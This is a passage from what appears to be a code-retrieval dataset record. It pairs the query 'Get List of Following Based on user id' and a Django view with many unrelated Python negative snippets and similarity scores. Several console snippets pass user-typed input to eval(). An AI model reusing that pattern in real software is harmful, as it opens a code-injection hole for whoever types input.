True:\n args[3] = float(args[3])\n except:\n pass\n setattr(models.storage.all()[k], args[2], args[3])\n models.storage.all()[k].save()\n else:\n print(\"** value missing **\")\n else:\n print(\"** attribute name missing **\")\n else:\n print(\"** no instance found **\")\n else:\n print(\"** instance id missing **\")\n else:\n print(\"** class doesn't exist **\")", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, model: Type[ModelType]):\n self.model = model", "def __init__(self, args):\n self.args = args", "def validate_class_args(self, **kwargs):\n pass", "def cmd_type(args):", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def get_model_args(args):\r\n global MODEL_ARCHITECTURE, MODEL_OPTIMIZER, ADVANCED_OPTIONS, \\\r\n DATA_OPTIONS, BERT_CONFIG\r\n\r\n required_args = MODEL_ARCHITECTURE | MODEL_OPTIMIZER | ADVANCED_OPTIONS \\\r\n | DATA_OPTIONS | BERT_CONFIG\r\n\r\n arg_values = {k: v for k, v in vars(args).items() if k in required_args}\r\n return argparse.Namespace(**arg_values)", "def evaluate_single_model_unpack_args(args):\n return evaluate_single_model(*args)", "def do_update(self, arg):\n if len(arg) == 0:\n print(\"** class name missing **\")\n return\n coms = tuple(arg.split())\n if coms[0] not in self.cls:\n print(\"** class doesn't exist **\")\n elif len(coms) < 2:\n print(\"** instance id missing **\")\n return\n obj = coms[0] + \".\" + coms[1]\n if obj not in storage.all().keys():\n print(\"** no instance found **\")\n elif len(coms) < 3:\n print(\"** attribute name missing **\")\n elif len(coms) < 4:\n print(\"** value missing **\")\n else:\n typecast = type(eval(coms[3]))\n form = coms[3].strip('\"')\n form = form.strip(\"'\")\n setattr(storage.all()[obj], coms[2], typecast(form))", "def __init__(self, model: object):\n self.model = model", "def do_create(self, args):\n\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n token = args.split()\n\n try:\n nwInstance = eval(token[0])()\n nwInstance.save()\n print(nwInstance.id)\n except:\n print(\"** class doesn't exist **\")", "def do_create(self, arg):\n if len(arg) is 0:\n print(\"** class name missing **\")\n elif arg not in self.dict.keys():\n print(\"** class doesn't exist **\")\n\n else:\n\n created = self.dict[arg]()\n created.save()\n\n print(created.id)", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def __init__(self, model):\n\t\tself.model = model", "def parse(cls, model_path: str, **kwargs):", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def __init__(self, args):\n super().__init__()\n self.args = args\n # get the controller using the command line arguments\n self.get_controller(args)", "def __init__(self, model_uri: str = None, method: str = \"predict\", modelUri: str = None, type: str = None):\n super().__init__()\n print(model_uri, modelUri, type)\n self.model_uri = model_uri\n self.method = method\n self.ready = False\n self.load()", "def build_model():", "def get_model(name, **model_args):\n module = importlib.import_module('.' + name, 'models')\n return module.build_model(**model_args)", "def do_update(self, *args):\n if len(args) == 1:\n args = [ele for ele in args[0].split(' ')]\n if args[0] == '':\n print(\"** class name missing **\")\n return\n if args[0] not in self.list_classes:\n print(\"** class doesn't exist **\")\n return\n if len(args) < 2:\n print(\"** instance id missing **\")\n return\n elif len(args) < 3:\n print(\"** attribute name missing **\")\n return\n elif len(args) < 4:\n print(\"** value missing **\")\n return\n\n storage.reload()\n dict_objs = storage.all()\n if dict_objs is None or dict_objs == []:\n print(\"** no instance found **\")\n return\n\n key = \"{}.{}\".format(args[0], args[1])\n if key in dict_objs.keys():\n obj = dict_objs[key]\n if args[2] in obj.__class__.__dict__:\n obj.__dict__[args[2]] =\\\n type(obj.__class__.__dict__[args[2]])(args[3])\n else:\n obj.__dict__[args[2]] = args[3]\n storage.save()\n else:\n print(\"** no instance found **\")", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def initialize(self, args):\n # You must parse model_config. JSON string is not parsed here\n self.model_config = json.loads(args['model_config'])\n print(\"model_config:\", self.model_config)\n\n self.input_names = []\n for input_config in self.model_config[\"input\"]:\n self.input_names.append(input_config[\"name\"])\n print(\"postprocess input names:\", self.input_names)\n\n self.output_names = []\n self.output_dtype = []\n for output_config in self.model_config[\"output\"]:\n self.output_names.append(output_config[\"name\"])\n dtype = pb_utils.triton_string_to_numpy(output_config[\"data_type\"])\n self.output_dtype.append(dtype)\n print(\"postprocess output names:\", self.output_names)\n self.postprocessor = fd.vision.ocr.DBDetectorPostprocessor()\n self.cls_preprocessor = fd.vision.ocr.ClassifierPreprocessor()\n self.rec_preprocessor = fd.vision.ocr.RecognizerPreprocessor()\n self.cls_threshold = 0.9", "def _run(self, args: argparse.Namespace) -> int:\n log.set_log_level_from_args(args)\n return self.replicate_object(args.model, args)", "def __init__(self, *args):\n\n self.args = args", "def __init__(self, *args):\n\n self.args = args", "def model_arg_parse(cls, parser):\r\n # for mslite config\r\n parser.add_argument('--thread_affinity_mode',\r\n type=int,\r\n default=2,\r\n help='thread affinity number for mslite inference')\r\n\r\n parser.add_argument('--thread_num',\r\n type=int,\r\n default=1,\r\n help='thread number for mslite inference')\r\n\r\n parser.add_argument('--mslite_model_type',\r\n type=int,\r\n default=0,\r\n choices=[0, 4],\r\n help='input model type for mslite inference, '\r\n '0 for MINDIR, 4 for MINDIR_LITE')\r\n\r\n parser.add_argument('--ascend_provider',\r\n type=str,\r\n default='',\r\n choices=['', 'ge'],\r\n help=\"Ascend infer method: '' for acl, 'ge' for GE\")\r\n\r\n # for tensorrt infer\r\n parser.add_argument('--tensorrt_optim_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--tensorrt_min_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--tensorrt_max_input_shape',\r\n type=str,\r\n default=None,\r\n help='optim input shape for tensorrt'\r\n 'with key tensor name (str) '\r\n 'and value shape info(List[int])')\r\n\r\n parser.add_argument('--gpu_memory_size',\r\n type=int,\r\n default=100,\r\n help='gpu init memory size(M)')\r\n\r\n parser.add_argument('--is_enable_tensorrt',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether use tensorrt engine\")\r\n\r\n parser.add_argument('--is_fp16',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether apply fp16 infer\")\r\n\r\n parser.add_argument('--is_int8',\r\n type=bool,\r\n default=False,\r\n help=\"flag indicate whether apply int8 infer\")", "def test_model_found(arguments):\n ...", "def __init__(self, model: str, **kwargs):\n\n super().__init__(model=model, **kwargs)\n logger.info('load model done')", "def __init__(self,given_type):\n self.given_type=given_type", "def get_model(model_name: str, *args, **kwargs):\n try:\n if '.' in model_name:\n module_name, class_name = model_name.rsplit('.', 1)\n else:\n module_name = model_name\n class_name = model_name.capitalize().replace(\"_\",\"\")\n\n model_module = import_module('.' + module_name, package='models')\n\n model_class = getattr(model_module, class_name)\n\n instance = model_class(*args, **kwargs)\n\n except (AttributeError, ModuleNotFoundError):\n raise ImportError('{} is not part of our model/architecture collection.'.format(model_name))\n else:\n if not issubclass(model_class, Model):\n raise ImportError(\"{} is not a valid model/architecture.\".format(model_class))\n\n return instance", "def do_update(self, args):\n args = args.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if len(args) == 1:\n print(\"** instance id missing **\")\n return\n if len(args) == 2:\n print(\"** attribute name missing **\")\n return\n if len(args) == 3:\n print(\"** value missing **\")\n return\n if args[0] not in HBNBCommand.valid_classes.keys():\n print(\"** class doesn't exist **\")\n return\n all_objs = storage.all(args[0])\n for k, v in all_objs.items():\n if k == args[1]:\n setattr(v, args[2], args[3])\n storage.save()\n return\n print(\"** no instance found **\")", "def model(self) -> str:\n ...", "def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n elif not args[0] in class_type:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif (\"{}.{}\".format(args[0], args[1]) not in storage.all().keys()):\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n new_dict = models.storage.all()\n tmp = \"{}.{}\".format(args[0], args[1])\n if tmp in new_dict.keys():\n attr = getattr(new_dict[tmp], args[2], \"\")\n setattr(new_dict[tmp], args[2], type(attr)(args[3]))\n new_dict[tmp].save()", "def __init__(self, **kwargs):\n\n def paraChck(**kwargs):\n \"\"\"\n check and validate the keyword argument input\n \"\"\"\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val\n \n def_val = paraChck(**kwargs)\n\n class Bunch(object):\n def __init__(self, adict):\n self.__dict__.update(adict)\n \n self.x_train = def_val['x_train']\n self.y_train = def_val['y_train']\n self.x_test = def_val['x_test']\n self.y_test = def_val['y_test']\n self.channels = def_val['channel']\n self.input_img_rows = def_val['input_img_rows']\n self.input_img_cols = def_val['input_img_cols']\n self.nb_classes = def_val['nb_classes']\n self.plot_model = None\n self.model = None\n self.nb_epoch = def_val['nb_epoch']\n self.batch_size = def_val['batch_size']\n self.dict_label = def_val['dict_label']\n \n # default label dictionary if users do not provide\n values = ['label_' + str(i).zfill(2) for i in range(0,self.nb_classes)]\n keys = range(self.nb_classes) \n \n if self.dict_label is None:\n self.dict_label = dict(zip(keys, values))\n else:\n self.dict_label = kwargs['dict_label']\n \n self.dict_factor = {v: k for k, v in self.dict_label.items()}", "def train(self, model, args):\n if model == self.WORD_DET_RFC:\n return self.train_rfc(args)\n elif model == self.REGRESSION_PARAMS:\n return self.train_bb_reg(args)\n else:\n raise Exception('No model %s exists to train' % model)", "def build_model_fn(self):", "def __init__(self, *args):\n this = _libsbml.new_QualModelPlugin(*args)\n try: self.this.append(this)\n except: self.this = this", "def do_update(self, arg):\n arg = arg.split()\n try:\n h = arg[0] + \".\" + arg[1]\n except:\n pass\n objects = storage.all()\n if len(arg) is 0:\n print(\"** class name missing **\")\n elif len(arg) == 1 and arg[0] in self.dict.keys():\n print(\"** instance id missing **\")\n elif arg[0] not in self.dict.keys():\n print(\"** class doesn't exist **\")\n elif h not in objects.keys():\n print(\"** no instance found **\")\n elif len(arg) <= 2:\n print(\"** attribute name missing **\")\n elif len(arg) <= 3:\n print(\"** value missing **\")\n else:\n setattr(objects[h], arg[2], arg[3])\n storage.save()", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def _get_model(self, fl_ctx: FLContext):\n if isinstance(self.model, str):\n # treat it as model component ID\n model_component_id = self.model\n engine = fl_ctx.get_engine()\n self.model = engine.get_component(model_component_id)\n if not self.model:\n self.log_error(fl_ctx, f\"cannot find model component '{model_component_id}'\")\n return\n if self.model and isinstance(self.model, dict):\n # try building the model\n try:\n engine = fl_ctx.get_engine()\n # use provided or default optimizer arguments and add the model parameters\n if \"args\" not in self.model:\n self.model[\"args\"] = {}\n self.model = engine.build_component(self.model)\n except Exception as e:\n self.system_panic(\n f\"Exception while parsing `model`: \" f\"{self.model} with Exception {e}\",\n fl_ctx,\n )\n return\n if self.model and not isinstance(self.model, torch.nn.Module):\n self.system_panic(fl_ctx, f\"expect model to be torch.nn.Module but got {type(self.model)}: {self.model}\")\n return\n if self.model is None:\n self.system_panic(fl_ctx, f\"Model wasn't built correctly! It is {self.model}\")\n return\n self.log_info(fl_ctx, f\"Running model {self.model}\")", "def testModel( self, classTest, classPred):", "def get_model_class(class_name, kwargs={}):\n # , Perceptron, PassiveAggressiveRegressor\n # , NuSVR, LinearSVR\n\n if class_name == 'LinearRegression':\n from sklearn.linear_model import LinearRegression\n return LinearRegression(**kwargs)\n\n if class_name == 'SGDRegressor':\n from sklearn.linear_model import SGDRegressor\n return SGDRegressor(**kwargs)\n\n if class_name == 'SVR':\n from sklearn.svm import SVR\n return SVR(**kwargs)\n\n if class_name == 'DecisionTreeRegressor':\n from sklearn.tree import DecisionTreeRegressor\n return DecisionTreeRegressor(**kwargs)\n\n if class_name == 'ExtraTreesRegressor':\n from sklearn.ensemble import ExtraTreesRegressor\n return ExtraTreesRegressor(**kwargs)\n\n if class_name == 'KNeighborsRegressor':\n from sklearn.neighbors import KNeighborsRegressor\n return KNeighborsRegressor(**kwargs)\n\n if class_name == 'MLPRegressor':\n from sklearn.neural_network import MLPRegressor\n return MLPRegressor(**kwargs)\n\n raise Exception(\"Unknown Model class\")", "def __init__(self, classification, extras=[]):\n self.model_list = []\n self._generate_model_list(classification)\n self.model_list.extend(extras)\n self.classification = classification", "def do_new(self, args):\n model_name = questionary.text(\"Target name:\").ask()\n model_name = model_name.replace(\" \", \"\")\n\n available_frameworks = list(CFState.get_instance().loaded_frameworks.keys())\n framework_choice = questionary.select(\"Which framework?\", choices=available_frameworks).ask()\n\n if \"textattack\" in framework_choice:\n framework = \"TextTarget\"\n elif \"art\" in framework_choice:\n framework = \"ArtTarget\"\n else:\n raise ValueError(\"invalid framework\")\n\n if framework == \"TextTarget\":\n model_data_type = \"text\"\n elif framework == \"ArtTarget\":\n model_data_type = questionary.select(\"What data type?\", choices=[\"numpy\", \"image\"]).ask()\n else:\n raise ValueError(\"invalid framework\")\n\n if model_name not in os.listdir(config.targets_path):\n try:\n os.mkdir(f\"{config.targets_path}/{model_name}\")\n open(f\"{config.targets_path}/{model_name}/__init__.py\", \"w\").close()\n with open(f\"{config.targets_path}/{model_name}/{model_name}.py\", \"w\") as f:\n f.write(\n f\"\"\"\n\n# Generated by counterfit #\n\nfrom counterfit.core.targets import {framework}\n\nclass {model_name.capitalize()}({framework}):\n model_name = \"{model_name.lower()}\"\n model_data_type = \"{model_data_type}\"\n model_endpoint = \"\"\n model_input_shape = ()\n model_output_classes = []\n X = []\n\n def __init__(self):\n self.X = []\n\n def __call__(self, x):\n return x\n\"\"\"\n )\n\n CFState.get_instance().import_targets()\n except Exception as e:\n\n self.pwarning(f\"\\n [!] Failed to write target file: {e}.\\n\")\n\n else:\n self.pwarning(f\"\\n [!] {model_name} already exists. Choose a new name.\\n\")", "def load_model(self) -> Any:", "def __init__(self, model):\n self._model = model", "def main(args):\n # ------------------------\n # 1 INIT LIGHTNING MODEL\n # ------------------------\n model = LightningTemplateModel(**vars(args))\n\n # ------------------------\n # 2 INIT TRAINER\n # ------------------------\n trainer = Trainer.from_argparse_args(args)\n\n # ------------------------\n # 3 START TRAINING\n # ------------------------\n trainer.fit(model)", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n self._params = self.find_params()", "async def gpt2_set_model(self, ctx, *, arg=None):\n print('Command gpt2_set_model triggered')\n if arg:\n if arg in VALID_DEFAULT_MODELS:\n self.update_config(model_name=arg)\n else:\n await ctx.send(f\"ERROR: Invalid model name {arg}\")\n else:\n await ctx.send(\"ERROR: Argument required\")", "def __init__(self, student, teachers, args, name):\n\n super(CachedKDModel, self).__init__(args, \"cached_\" + name)\n\n # Init base models\n self.student = student\n self.teachers = teachers", "def handle(self, *args, **kwargs):\n # Part model\n try:\n print(\"Rebuilding Part objects\")\n\n from part.models import Part\n Part.objects.rebuild()\n except Exception:\n print(\"Error rebuilding Part objects\")\n\n # Part category\n try:\n print(\"Rebuilding PartCategory objects\")\n\n from part.models import PartCategory\n PartCategory.objects.rebuild()\n except Exception:\n print(\"Error rebuilding PartCategory objects\")\n\n # StockItem model\n try:\n print(\"Rebuilding StockItem objects\")\n\n from stock.models import StockItem\n StockItem.objects.rebuild()\n except Exception:\n print(\"Error rebuilding StockItem objects\")\n\n # StockLocation model\n try:\n print(\"Rebuilding StockLocation objects\")\n\n from stock.models import StockLocation\n StockLocation.objects.rebuild()\n except Exception:\n print(\"Error rebuilding StockLocation objects\")\n\n # Build model\n try:\n print(\"Rebuilding Build objects\")\n\n from build.models import Build\n Build.objects.rebuild()\n except Exception:\n print(\"Error rebuilding Build objects\")", "def do_update(self, arg):\n if type(arg) == str:\n arg_list = shlex.shlex(arg)\n arg_list.wordchars += \"-\"\n arg_list = list(arg_list)\n try:\n idx_start = arg_list.index(\"[\")\n idx_end = arg_list.index(\"]\")\n list_str = \"\".join(arg_list[idx_start:idx_end + 1])\n list_str = eval(list_str)\n list_start = arg_list[:idx_start]\n list_end = arg_list[idx_end + 1:]\n arg_list = list_start\n arg_list.append(list_str)\n arg_list.extend(list_end)\n except ValueError:\n pass\n else:\n arg_list = arg\n if not arg:\n print(\"** class name missing **\")\n return\n if arg_list[0] not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n if len(arg_list) < 2:\n print(\"** instance id missing **\")\n return\n key = arg_list[0] + \".\" + arg_list[1]\n if key not in storage.all():\n print(\"** no instance found **\")\n return\n if len(arg_list) == 3 and type(arg_list[2]) == dict:\n obj = storage.all()[key]\n for key, val in arg_list[2].items():\n setattr(obj, key, val)\n obj.save()\n return\n if len(arg_list) < 3:\n print(\"** attribute name missing **\")\n return\n if len(arg_list) < 4:\n print(\"** value missing **\")\n return\n obj = storage.all()[key]\n if type(arg_list[3]) != list:\n arg_list[3].replace('\"', \"\").replace(\"'\", \"\")\n setattr(obj, arg_list[2].replace('\"', \"\").replace(\"'\", \"\"),\n arg_list[3])\n obj.save()", "def run_model (arguments):\n if arguments.train is not None:\n # Train a new model, optionally with a certain number of epochs\n predictor = None\n if len(arguments.train) > 0:\n predictor = train(n_epochs=arguments.train[0])\n else:\n predictor = train()\n # Afterwards save it\n now = datetime.now(timezone.utc)\n predictor.to_disk(fname=f\"model_parameters_{now.strftime('%Y%m%d%H%M%S')}\")\n elif arguments.export_embeddings:\n # Load the saved predictor ...\n predictor = Predictor.from_file()\n # ... and then dump the models to disk.\n predictor.subj.export_embeddings(\"subject\")\n predictor.obj.export_embeddings(\"object\")\n print(\"Models are saved to output directory for loading with http://projector.tensorflow.org/.\")\n elif arguments.console:\n # Opens a console for prediction without training\n predictor = Predictor.from_file()\n tinker(predictor)", "def class_exec(self, cls_name, args):\n if args[:6] == '.all()':\n self.do_all(cls_name)\n elif args[:6] == '.show(':\n self.do_show(cls_name + ' ' + args[7:-2])\n elif args[:8] == \".count()\":\n all_objs = {k: v for (k, v) in storage.all().items()\n if isinstance(v, eval(cls_name))}\n print(len(all_objs))\n elif args[:9] == '.destroy(':\n self.do_destroy(cls_name + ' ' + args[10:-2])\n elif args[:8] == '.update(':\n if '{' in args and '}' in args:\n new_arg = args[8:-1].split('{')\n new_arg[1] = '{' + new_arg[1]\n else:\n new_arg = args[8:-1].split(',')\n if len(new_arg) == 3:\n new_arg = \" \".join(new_arg)\n new_arg = new_arg.replace(\"\\\"\", \"\")\n new_arg = new_arg.replace(\" \", \" \")\n self.do_update(cls_name + ' ' + new_arg)\n elif len(new_arg) == 2:\n try:\n dict = eval(new_arg[1])\n except:\n return\n for j in dict.keys():\n self.do_update(cls_name + ' ' + new_arg[0][1:-3] + ' ' +\n str(j) + ' ' + str(dict[j]))\n else:\n return\n else:\n print(\"Not a valid command\")", "def do_update(self, args):\n args = shlex.split(args)\n dicti = storage.all()\n if not args:\n print(\"** class name missing **\")\n elif not args[0] in name_of_class:\n print(\"** class doesn't exist **\")\n elif len(args) == 1:\n print(\"** instance id missing **\")\n elif not \"{}.{}\".format(args[0], args[1]) in dicti:\n print(\"** no instance found **\")\n elif len(args) == 2:\n print(\"** attribute name missing **\")\n elif len(args) == 3:\n print(\"** value missing **\")\n else:\n key = dicti[\"{}.{}\".format(args[0], args[1])]\n setattr(key, args[2], args[3])\n key.save()", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def __init__(self, model_class, **kwargs):\n super(BulkEntryBaseTransformer, self).__init__(**kwargs)\n assert model_class\n self.model_class = model_class\n self.sync_keys = (\n self.account_manager.get_settings()['synchronize_key']\n )\n self.skip = (\n not self.sync_keys and\n self.model_class in (SshKey, Identity)\n )", "def __init__(self, **kwargs):\n\n # Identify the mode to start the model in\n if \"x\" in kwargs and \"y\" in kwargs:\n x = kwargs.get(\"x\")\n y = kwargs.get(\"y\")\n if \"model_name\" not in kwargs:\n self.__mode = \"train\"\n else:\n self.__mode = \"retrain\"\n elif \"model_name\" in kwargs:\n self.__mode = \"test\"\n else:\n raise NameError(\"Cannot infer mode from arguments.\")\n\n print(\"Initializing model in %s mode.\" % self.__mode)\n\n if self.mode == \"train\":\n # Infer input type from type(x)\n if type(x[0]) == np.bytes_:\n print(\"Input type is 'binary mols'.\")\n self.__input_type = \"mols\" # binary RDKit mols\n else:\n print(\"Input type is 'molecular descriptors'.\")\n self.__input_type = \"descriptors\" # other molecular descriptors\n\n # If scaling is required\n if kwargs.get(\"scaling\", False) is True:\n # Normalize the input\n print(\"Applying scaling on input.\")\n self.__scaler = StandardScaler()\n x = self.__scaler.fit_transform(x)\n else:\n self.__scaler = None\n\n # If PCA is required\n if kwargs.get(\"pca\", False) is True:\n print(\"Applying PCA on input.\")\n self.__pca = PCA(\n n_components=x.shape[1]\n ) # n_components=n_features for now\n x = self.__pca.fit_transform(x)\n else:\n self.__pca = None\n\n self.__maxlen = (\n kwargs.get(\"dataset_info\")[\"maxlen\"] + 10\n ) # Extend maxlen to avoid breaks in training\n self.__charset = kwargs.get(\"dataset_info\")[\"charset\"]\n self.__dataset_name = kwargs.get(\"dataset_info\")[\"name\"]\n self.__lstm_dim = kwargs.get(\"lstm_dim\", 256)\n self.__h_activation = kwargs.get(\"h_activation\", \"relu\")\n self.__bn = kwargs.get(\"bn\", True)\n self.__bn_momentum = kwargs.get(\"bn_momentum\", 0.9)\n self.__noise_std = kwargs.get(\"noise_std\", 0.01)\n self.__td_dense_dim = kwargs.get(\n \"td_dense_dim\", 0\n ) # >0 squeezes RNN connections with Dense sandwiches\n self.__batch_size = kwargs.get(\"batch_size\", 256)\n self.__dec_layers = kwargs.get(\"dec_layers\", 2)\n\n if self.input_type == \"descriptors\":\n self.__codelayer_dim = x.shape[1] # features\n if \"codelayer_dim\" in kwargs:\n print(\n \"Ignoring requested codelayer_dim because it is inferred from the cardinality of the descriptors.\"\n )\n else:\n self.__codelayer_dim = kwargs.get(\"codelayer_dim\", 128)\n \n # Create the left/right-padding vectorizers\n self.__smilesvec1 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n )\n\n self.__smilesvec2 = SmilesVectorizer(\n canonical=False,\n augment=True,\n maxlength=self.maxlen,\n charset=self.charset,\n binary=True,\n leftpad=False,\n )\n\n # self.train_gen.next() #This line is needed to set train_gen.dims (to be fixed in HetSmilesGenerator)\n self.__input_shape = self.smilesvec1.dims\n self.__dec_dims = list(self.smilesvec1.dims)\n self.__dec_dims[0] = self.dec_dims[0] - 1\n self.__dec_input_shape = self.dec_dims\n self.__output_len = self.smilesvec1.dims[0] - 1\n self.__output_dims = self.smilesvec1.dims[-1]\n\n # Build all sub-models as untrained models\n if self.input_type == \"mols\":\n self.__build_mol_to_latent_model()\n else:\n self.__mol_to_latent_model = None\n\n self.__build_latent_to_states_model()\n self.__build_batch_model()\n\n # Build data generators\n self.__build_generators(x, y)\n\n # Retrain or Test mode\n else:\n self.__model_name = kwargs.get(\"model_name\")\n\n # Load the model\n self.__load(self.model_name)\n \n if self.mode == \"retrain\":\n # If scaling is required\n if self.scaler is not None:\n print(\"Applying scaling on input.\")\n x = self.scaler.transform(x)\n\n # If PCA is required\n if self.pca is not None:\n print(\"Applying PCA on input.\")\n x = self.pca.transform(x)\n \n # Build data generators\n self.__build_generators(x, y)\n\n # Build full model out of the sub-models\n self.__build_model()\n\n # Show the resulting full model\n print(self.model.summary())", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def __init__(self, type_name, args):\n super().__init__()\n self.type_name = type_name\n self.args = args\n self._projection = None", "def create_reid_model(name, *args, **kwargs):\r\n if name not in __factory:\r\n raise KeyError(\"Unknown model:\", name)\r\n return __factory[name](*args, **kwargs)", "def create_models( self ):" ]
[ "0.7021158", "0.6954336", "0.6561183", "0.6485083", "0.6346957", "0.63075995", "0.6284837", "0.6276257", "0.6271687", "0.62641424", "0.62498045", "0.6244961", "0.6220076", "0.6219613", "0.62072104", "0.61494976", "0.612144", "0.6111465", "0.60642654", "0.599565", "0.5991916", "0.59918535", "0.597002", "0.5937721", "0.5934284", "0.59213287", "0.5894491", "0.5886086", "0.58792347", "0.5876709", "0.584279", "0.584279", "0.58375645", "0.5808577", "0.5798929", "0.57961905", "0.57961905", "0.57961905", "0.57961905", "0.57957804", "0.5783583", "0.5773361", "0.5772717", "0.5772441", "0.57373214", "0.57370955", "0.57370955", "0.57370955", "0.57370955", "0.57370955", "0.5726871", "0.5722515", "0.5719627", "0.5712789", "0.57049996", "0.5695355", "0.5685483", "0.5673155", "0.566715", "0.5634266", "0.56207913", "0.5618345", "0.5618345", "0.56167054", "0.55886346", "0.5578644", "0.55775106", "0.55717415", "0.55646014", "0.5562306", "0.5547169", "0.55469555", "0.55469245", "0.5544589", "0.5540068", "0.5524754", "0.5522004", "0.5519004", "0.55066425", "0.5503253", "0.5498183", "0.54836553", "0.54804856", "0.54749566", "0.547217", "0.54688674", "0.5464028", "0.5460012", "0.54565704", "0.5453965", "0.5453364", "0.5442643", "0.54393655", "0.5432328", "0.5430151", "0.54299545", "0.5428578", "0.54270923", "0.5412916", "0.54087335" ]
0.57535255
44
Get List of Following Based on user id
def get_following_by_user(request): response, status_code = get_followings(request) if status_code != 200: return JsonResponse(response, status=status_code) serialize_data = FollowingSerializer(response, many=False).data return JsonResponse(serialize_data, status=status_code, safe=False)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_following(user_id):\n return list(Forward.objects.filter(source_id=user_id).values_list(\n 'destination_id', flat=True))", "def get_followings(request):\n user_id = request.GET.get(\"user_id\")\n if not user_id:\n return {\"error\": \"User Id should be provided\"}, 400\n following_data = Following.objects.filter(user_profile_id=user_id, is_active=True).first()\n return following_data, 200", "def get_followers(user_id):\n return list(Backward.objects.filter(destination_id=user_id) \\\n .values_list('source_id', flat=True))", "def getFollowings(user_id, api):\n \n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n \n _ = api.getUserFollowings(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def _user_following_info(self, uid: int = 0) -> List[_InstagramUser]:\n # If no uid was specified, use the authenticated user's uid\n if uid == 0:\n uid = self.uid\n\n followings: List[Dict[str, Any]] = self.api.getTotalFollowings(uid)\n user_followings = list([_InstagramUser(x) for x in followings])\n return user_followings", "def getFollowers(self, user_id, api):\n followers = []\n next_max_id = True\n while next_max_id:\n # first iteration hack\n if next_max_id is True:\n next_max_id = ''\n \n _ = api.getUserFollowers(user_id, maxid=next_max_id)\n followers.extend(api.LastJson.get('users', []))\n next_max_id = api.LastJson.get('next_max_id', '')\n return followers", "def resolve_following(self, info):\n user = info.context.user\n follow_request = FollowRequest.objects.filter(follower=user.id, pending=False)\n return [follow.following for follow in follow_request]", "def getFollowers():\n\n cur, user_id = initialise(3)\n cur.execute(\"SELECT following FROM followers WHERE user = (SELECT username FROM users WHERE id = ?)\", [user_id])\n tempFollowers = cur.fetchall()\n followers = []\n for follower in tempFollowers:\n followers.append(follower[0])\n return followers", "def get_user_following(self, user_id, count = 30, page = 1):\n uri = 'users/' + user_id + '/following'\n options = { 'per_page': cont, 'page': page }\n return self.make_request(uri, options)", "def show_following(user_id):\n\n\n user = User.query.get_or_404(user_id)\n return render_template('users/following.html', user=user)", "def by_follower_id(cls, follower_id, request):\n\t\treturn request.dbsession.query(Follow).filter_by(follower_id=follower_id).all()", "def _get_followed(_user_id, _ignore_exceptions=False, _start_index=0, _count=100):\n _following_url = f\"{base_url}/people/{_user_id}/@following?count={_count}\" + \\\n f\"&startIndex={_start_index}\"\n _response = core.get_request_with_retries(_following_url)\n if _response.status_code == 200:\n _following_data = _response.json()\n else:\n if _ignore_exceptions:\n _empty_response = {\"list\": []}\n _following_data = core_utils.convert_dict_to_json(_empty_response)\n else:\n if _response.status_code == 404:\n raise errors.exceptions.UserNotFoundError()\n else:\n raise errors.exceptions.UserQueryError()\n return _following_data", "def select_user_following(args):\n is_parameter_exists([\n constants.ID\n ], args)\n\n # Request User\n request_user = args[constants.USER]\n\n # Requested User ID\n requested_user_id = args[constants.ID]\n\n # Page Number\n page_number = 1 if constants.PAGE_NUMBER not in args else int(args[constants.PAGE_NUMBER])\n\n # Check User Id\n if not User.objects.filter(id=requested_user_id).exists():\n raise ApiError(constants.NOT_EXIST_OBJECT)\n\n # Following QuerySet\n queryset = UserFollow.objects.filter(following_user=requested_user_id).values_list('followed_user', flat=True)\n\n # User Ids\n user_ids = get_results_from_queryset(queryset, 10, page_number)\n\n # is_finished\n is_finished = not user_ids.has_next()\n\n # Filter Query\n filter_query = Q(id__in=user_ids)\n\n # Users\n users, _, _ = __get_users(filter_query, request_user, 10)\n\n return users, page_number, is_finished", "def get_follows(self):\n return [c.id for c in self.conf.follows]", "def user_following_v1(self, user_id: int, amount: int = 0) -> list:\n user_id = int(user_id)\n max_id = \"\"\n users = []\n while True:\n result = self.private_request(\n 